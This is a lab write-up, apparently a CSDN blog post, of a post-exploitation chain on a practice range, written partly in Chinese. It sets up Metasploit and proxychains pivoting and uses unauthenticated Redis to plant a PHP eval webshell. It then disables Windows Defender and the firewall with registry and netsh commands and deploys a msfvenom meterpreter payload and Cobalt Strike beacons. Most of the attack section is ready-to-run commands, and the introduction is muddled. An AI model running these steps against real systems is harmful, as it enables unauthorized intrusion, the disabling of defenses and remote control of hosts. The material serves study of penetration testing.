Intranet security: Intranet penetration. (Obtain the highest authority of the intranet host)
Intranet traversal is also called NAT traversal. Intranet ports are mapped to external networks to establish connections between hosts in a private TCP/IP network using NAT devices. Through port mapping, the computer on the external network can find the computer on the internal network. Port mapping is a kind of NAT address translation, and its function is to translate addresses on the public network into private addresses. Run on any PC or server inside the LAN to the intranet penetration client. At this time, the IP address resolved by the domain name is the public network IP address at the gateway exit of the LAN, and then do port mapping at the gateway to point to the monitoring device. .
Table of contents:
Intranet security: Intranet penetration. (Obtain the highest authority of the intranet host)
The network environment shows:
Disclaimer:
It is strictly forbidden to use the virtual machines and technologies mentioned in this article to conduct any form of attack, otherwise the consequences will be at your own risk, and the uploader will not bear any responsibility.
The network environment shows:
Host information:
| host | Extranet |
Intranet 1 | Intranet 2 |
| kali | 192.168.0.101 | ||
| win 7 | 192.168.0.102 | 10.0.20.98 | |
| win 2016 | 10.0.20.99 | 10.0.10.111 | |
| win 2019 | 10.0.10.110 |
The previous web server penetration: Web security: get the highest authority of the web server. (vulntarget shooting range 1)_Half a watermelon.'s blog-CSDN blog
Intranet penetration testing:
(1) Intranet host detection:
shell ipconfig //查看 网卡的 网段信息.
主机探测和端口探测.
发现一台内网主机,IP为 10.0.20.99
(2) Build the channel:
代理转发.【msf 代理】
run post/multi/manage/autoroute // 添加路由
run autoroute -p // 查看路由
代理转发.【CS 代理】
查看代理信息.
修改配置 /etc/proxychains4.conf 文件
vim /etc/proxychains4.conf //打开这个文件.
(3) Intranet scanning:
浏览器配置代理:
进行访问 第二层内网主机的 6379 端口( Redis 服务 )
proxychains4 redis-cli -h 10.0.20.99
proxychains4 redis-cli -h 【第二层内网 主机 IP 地址】
(4) Intranet penetration:
利用 Redis 未授权漏洞.由于 10.0.20.99 这台机器开启了Web服务,我们要通过 Resis 未授权漏洞写入webshell,于是我们
需要知道网站的绝对路径,并且需要具有读写权限。
方法一:
我们也可以简单探测,有没有可能暴露敏感信息的文件
比如:/phpinfo.php 这些文件.(这个过程可以使用目录扫描等等方法.)
(Resis 未授权漏洞 默认路径: C:\phpStudy\PHPTutorial\www\)
方法二:
如果不是这个默认路径,则修改为路径: Redis写启动项(需要猜路径 猜用户名),定时自动执行bat脚本
上线或者反弹shell
因此我们写入 wenshell (一句话木马)(1)proxychains4 redis-cli -h 10.0.20.99 //连接 Redis 服务.
(2)config set dir "C:/phpStudy/PHPTutorial/www/"
//在网站的根目录下写进去一个脚本.(C:/phpStudy/PHPTutorial/www/ 是 win 默认路径)
(3)config set dbfilename bgxg.php //脚本名称为 bgxg.php
(4)set 1 "<?php @eval($_POST['bgxg']);?>" // 脚本内容(一句话木马)
(5)save // 保存 刚刚写入的信息.
上传木马程序,需要关闭 Windows Denfder
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
gpupdate /force
上传木马程序,需要关闭防火墙.
(1)Netsh advfirewall show allprofiles // 查看防火墙配置
(2)netSh advfirewall set allprofiles state off // 关闭防火墙
(5) Online MSF:
渗透 第二层 内网.[msf 代理]run post/multi/manage/autoroute // 添加路由
run autoroute -p // 查看路由
background // 挂起 会话
重新再生成一个新的程序(木马)【用来渗透第二层内网.】
msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.0.101 LPORT=12345 -f exe > 12345.exe
set payload windows/meterpreter/bind_tcp // 设置 payload
set lport 12345 // 设置 和程序(木马)的端口
set rhost 10.0.20.99 // 设置 第二层内网的目标主机.
run // 进行 测试.
利用 蚁剑 进行上传 程序(木马)到第二层主机中 并执行.
(6) Online CS :
建立 Beacon TCP 监听器:
生成一个新程序木马.(要来渗透第二层内网的其他主机)
利用 蚁剑 进行上传 程序(木马)
connect 10.0.20.99 666
connect 第二层内网主机 IP 地址 木马的端口